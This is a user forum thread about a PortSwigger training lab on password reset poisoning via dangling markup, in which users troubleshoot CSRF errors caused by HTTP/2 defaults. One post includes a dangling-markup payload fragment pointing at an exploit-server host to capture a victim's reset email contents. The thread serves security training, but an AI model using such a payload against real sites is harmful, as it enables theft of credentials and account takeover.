Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Password reset poisonin via dangling markup

Dark | Last updated: Jun 05, 2021 12:43PM UTC

in the step 5 they all time show me that CSRF token is invalid. Even if I follow the video tutorial the thing is same. so help me to solve the lab.

Uthman, PortSwigger Agent | Last updated: Jun 07, 2021 10:12AM UTC

Thanks for reporting this. We have checked the lab and it appears to be functioning without any issues. Can you double-check that you are sending the correct request to the Repeater? If you believe there could be a bug, please email support@portswigger.net with a screen recording of your attempt.

Nstderr | Last updated: Apr 09, 2023 09:28PM UTC

I'm not sure how you determined it functions without issues, since the issue is with burp and its default settings. For anyone else that's having this "Parameter missing: 'csrf'" issue, it's due to Burp automatically changing the protocol to HTTP/2. If this is disabled in settings (Network>settings>http>uncheck "Default to HTTP/2 if the server supports it"), the csrf error is fixed.

Ben, PortSwigger Agent | Last updated: Apr 10, 2023 08:41AM UTC

Hi, Just to clarify, the initial response to this forum thread was made nearly two years ago prior to the labs supporting HTTP/2. In terms of the current issues with the lab - we are in the process of updating our instructions, where necessary, in order for them to still be relevant now that the labs do support HTTP/2. This looks like it is a lab that we need to address so we will discuss this with the wider team.

werthergotguns | Last updated: Sep 07, 2023 02:06PM UTC

There is a bug in the lab, you can solve it by enforcing the use of the HTTP 1.1 protocol in the proxy, before passing the request to repeater. Also, the payload in the lab solution doesn't work. This is the correct one: :'><a href="//exploit-TOKEN.exploit-server.net/?

Ben, PortSwigger Agent | Last updated: Sep 07, 2023 05:06PM UTC

Hi, You should be able to solve this lab without changing the protocol to HTTP/2 by using Burp version 2023.10 or above (this is currently an early adopter release). I have just run through this lab and the written solution, including the suggested payload, still works and allows you to retrieve the password from the access log. Are you able to share further details with regards to why you believe this does not work?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.